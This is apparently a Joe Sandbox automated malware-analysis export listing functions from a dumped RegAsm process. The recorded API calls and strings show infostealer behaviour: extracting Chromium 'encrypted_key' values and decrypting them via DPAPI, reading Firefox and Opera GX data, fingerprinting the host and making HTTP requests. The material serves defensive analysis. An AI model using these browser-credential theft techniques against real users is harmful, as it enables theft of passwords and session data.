Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

^userContextId=4294967295, xrefs: 0040D4D7
moz-extension+++, xrefs: 0040D4DD

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 0040821B
"encrypted_key":", xrefs: 004081DF
, xrefs: 00408241

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

nzA, xrefs: 004164AE

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: nzA
API String ID: 153043497-1761861442
Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 00416896
ERROR, xrefs: 0041686B

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 6C083060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C083095

Part of subcall function 6C0835A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C10F688,00001000), ref: 6C0835D5
Part of subcall function 6C0835A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0835E0
Part of subcall function 6C0835A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0835FD
Part of subcall function 6C0835A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C08363F
Part of subcall function 6C0835A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C08369F
Part of subcall function 6C0835A0: __aulldiv.LIBCMT ref: 6C0836E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C08309F

Part of subcall function 6C0A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5B85
Part of subcall function 6C0A5B50: EnterCriticalSection.KERNEL32(6C10F688,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5B90
Part of subcall function 6C0A5B50: LeaveCriticalSection.KERNEL32(6C10F688,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5BD8
Part of subcall function 6C0A5B50: GetTickCount64.KERNEL32 ref: 6C0A5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0830BE

Part of subcall function 6C0830F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C083127
Part of subcall function 6C0830F0: __aulldiv.LIBCMT ref: 6C083140

Part of subcall function 6C0BAB2A: __onexit.LIBCMT ref: 6C0BAB30

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 68894665d9cf0fa6fca9bfeee4733095f1b18f2a615a9dfd986c81013d22e32c
Instruction ID: a7bfff5eff122078fdd8f320f411c309ed76249ab640560bd4d35c30fe8db606
Opcode Fuzzy Hash: 68894665d9cf0fa6fca9bfeee4733095f1b18f2a615a9dfd986c81013d22e32c
Instruction Fuzzy Hash: 36F0D612F2074497CA10DF7488422A6B7B0AF6F214F10571DE86463551FF2072D99385

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
